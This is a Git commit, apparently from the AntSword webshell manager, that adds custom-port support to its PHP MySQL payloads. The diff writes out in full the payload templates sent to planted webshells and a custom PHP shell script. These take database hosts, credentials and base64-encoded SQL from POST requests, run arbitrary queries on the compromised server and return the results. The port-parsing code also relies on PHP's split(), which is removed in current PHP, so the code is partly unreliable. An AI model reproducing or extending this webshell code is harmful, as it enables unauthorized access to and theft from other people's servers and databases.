(Fix:Core) 修复 PHP mysqli 指定其它端口时失败的问题

raystyle · May 22, 2019 · 4afdb56 · 4afdb56
1 parent ce7f72c
commit 4afdb56
Show file tree

Hide file tree

Showing 3 changed files with 76 additions and 5 deletions.
diff --git a/CHANGELOG.md b/CHANGELOG.md
@@ -11,6 +11,7 @@
 > `decode_str` 其实相当于是 `decode_buff` 执行后调用了 `toString`
 
 * 解码器解码后, 增加猜解字符编码流程
+* 修复 PHP mysqli 指定其它端口时失败的问题
 
 ### 其它
 

diff --git a/shells/php_custom_script_for_mysql.php b/shells/php_custom_script_for_mysql.php
@@ -24,6 +24,9 @@
 *  4. 本脚本中 encoder 与 AntSword 添加 Shell 时选择的 encoder 要一致，如果选择 default 则需要将 encoder 值设置为空
 *
 * ChangeLog:
+*   Date: 2019/05/22 v1.3
+*    1. 支持 mysqli 连接非默认端口
+*
 *   Date: 2019/04/05 v1.2
 *    1. 新增 listcmd 接口
 *    2. 新增数据库支持函数检查接口
@@ -135,7 +138,9 @@ function executeSQL($encode, $conf, $sql, $columnsep, $rowsep, $needcoluname){
         $password = $data[1];    
     }
     $encode = decode(EC($encode));
-    $conn = @mysqli_connect($host, $user, $password);
+    $port=split(":",$host)[1];
+    $host=split(":",$host)[0];
+    $conn = @mysqli_connect($host, $user, $password, "", $port);
     $res = @mysqli_query($conn, $sql);
     if (is_bool($res)) {
         return "Status".$columnsep.$rowsep.($res?"True":"False").$columnsep.$rowsep;

diff --git a/source/core/php/template/database/mysqli.js b/source/core/php/template/database/mysqli.js
@@ -7,15 +7,38 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
   // 显示所有数据库
   show_databases: {
     _:
-      `$m=get_magic_quotes_gpc();$hst=$m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"];$usr=$m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"];$pwd=$m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"];$T=@mysqli_connect($hst,$usr,$pwd);$q=@mysqli_query($T,"SHOW DATABASES");while($rs=@mysqli_fetch_row($q)){echo(trim($rs[0]).chr(9));}@mysqli_close($T);`,
+      `$m=get_magic_quotes_gpc();
+      $hst=$m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"];
+      $usr=$m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"];
+      $pwd=$m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"];
+      $port=split(":",$hst)[1];
+      $hst=split(":",$hst)[0];
+      $T=@mysqli_connect($hst,$usr,$pwd,"",$port);
+      $q=@mysqli_query($T,"SHOW DATABASES");
+      while($rs=@mysqli_fetch_row($q)){
+        echo(trim($rs[0]).chr(9));
+      }
+      @mysqli_close($T);`.replace(/\n\s+/g, ''),
     [arg1]: '#{host}',
     [arg2]: '#{user}',
     [arg3]: '#{passwd}'
   },
   // 显示数据库所有表
   show_tables: {
     _:
-      `$m=get_magic_quotes_gpc();$hst=$m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"];$usr=$m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"];$pwd=$m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"];$dbn=$m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"];$T=@mysqli_connect($hst,$usr,$pwd);$q=@mysqli_query($T, "SHOW TABLES FROM \`{$dbn}\`");while($rs=@mysqli_fetch_row($q)){echo(trim($rs[0]).chr(9));}@mysqli_close($T);`,
+      `$m=get_magic_quotes_gpc();
+      $hst=$m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"];
+      $usr=$m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"];
+      $pwd=$m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"];
+      $dbn=$m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"];
+      $port=split(":",$hst)[1];
+      $hst=split(":",$hst)[0];
+      $T=@mysqli_connect($hst,$usr,$pwd,"",$port);
+      $q=@mysqli_query($T, "SHOW TABLES FROM \`{$dbn}\`");
+      while($rs=@mysqli_fetch_row($q)){
+        echo(trim($rs[0]).chr(9));
+      }
+      @mysqli_close($T);`.replace(/\n\s+/g, ''),
     [arg1]: '#{host}',
     [arg2]: '#{user}',
     [arg3]: '#{passwd}',
@@ -24,7 +47,21 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
   // 显示表字段
   show_columns: {
     _:
-      `$m=get_magic_quotes_gpc();$hst=$m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"];$usr=$m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"];$pwd=$m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"];$dbn=$m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"];$tab=$m?stripslashes($_POST["${arg5}"]):$_POST["${arg5}"];$T=@mysqli_connect($hst,$usr,$pwd);@mysqli_select_db($T, $dbn);$q=@mysqli_query($T, "SHOW COLUMNS FROM \`{$tab}\`");while($rs=@mysqli_fetch_row($q)){echo(trim($rs[0])." (".$rs[1].")".chr(9));}@mysqli_close($T);`,
+      `$m=get_magic_quotes_gpc();
+      $hst=$m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"];
+      $usr=$m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"];
+      $pwd=$m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"];
+      $dbn=$m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"];
+      $tab=$m?stripslashes($_POST["${arg5}"]):$_POST["${arg5}"];
+      $port=split(":",$hst)[1];
+      $hst=split(":",$hst)[0];
+      $T=@mysqli_connect($hst,$usr,$pwd,"",$port);
+      @mysqli_select_db($T, $dbn);
+      $q=@mysqli_query($T, "SHOW COLUMNS FROM \`{$tab}\`");
+      while($rs=@mysqli_fetch_row($q)){
+        echo(trim($rs[0])." (".$rs[1].")".chr(9));
+      }
+      @mysqli_close($T);`.replace(/\n\s+/g, ''),
     [arg1]: '#{host}',
     [arg2]: '#{user}',
     [arg3]: '#{passwd}',
@@ -34,7 +71,35 @@ module.exports = (arg1, arg2, arg3, arg4, arg5, arg6) => ({
   // 执行SQL语句
   query: {
     _:
-      `$m=get_magic_quotes_gpc();$hst=$m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"];$usr=$m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"];$pwd=$m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"];$dbn=$m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"];$sql=base64_decode($_POST["${arg5}"]);$T=@mysqli_connect($hst,$usr,$pwd);@mysqli_query($T,"SET NAMES $_POST[${arg6}]");@mysqli_select_db($T,$dbn);$q=@mysqli_query($T,$sql);if(is_bool($q)){echo("Status\t|\t\r\n".($q?"VHJ1ZQ==":"RmFsc2U=")."\t|\t\r\n");}{$i=0;while($col=@mysqli_fetch_field($q)){echo($col->name."\t|\t");$i++;}echo("\r\n");while($rs=@mysqli_fetch_row($q)){for($c=0;$c<$i;$c++){echo(base64_encode(trim($rs[$c])));echo("\t|\t");}echo("\r\n");}}@mysqli_close($T);`,
+      `$m=get_magic_quotes_gpc();
+      $hst=$m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"];
+      $usr=$m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"];
+      $pwd=$m?stripslashes($_POST["${arg3}"]):$_POST["${arg3}"];
+      $dbn=$m?stripslashes($_POST["${arg4}"]):$_POST["${arg4}"];
+      $sql=base64_decode($_POST["${arg5}"]);
+      $port=split(":",$hst)[1];
+      $hst=split(":",$hst)[0];
+      $T=@mysqli_connect($hst,$usr,$pwd,"",$port);
+      @mysqli_query($T,"SET NAMES $_POST[${arg6}]");
+      @mysqli_select_db($T,$dbn);
+      $q=@mysqli_query($T,$sql);
+      if(is_bool($q)){
+        echo("Status\t|\t\r\n".($q?"VHJ1ZQ==":"RmFsc2U=")."\t|\t\r\n");
+      }else{
+        $i=0;
+        while($col=@mysqli_fetch_field($q)){echo($col->name."\t|\t");
+        $i++;
+      }
+      echo("\r\n");
+      while($rs=@mysqli_fetch_row($q)){
+        for($c=0;$c<$i;$c++){
+          echo(base64_encode(trim($rs[$c])));
+          echo("\t|\t");
+        }
+        echo("\r\n");
+      }
+    }
+    @mysqli_close($T);`.replace(/\n\s+/g, ''),
     [arg1]: '#{host}',
     [arg2]: '#{user}',
     [arg3]: '#{passwd}',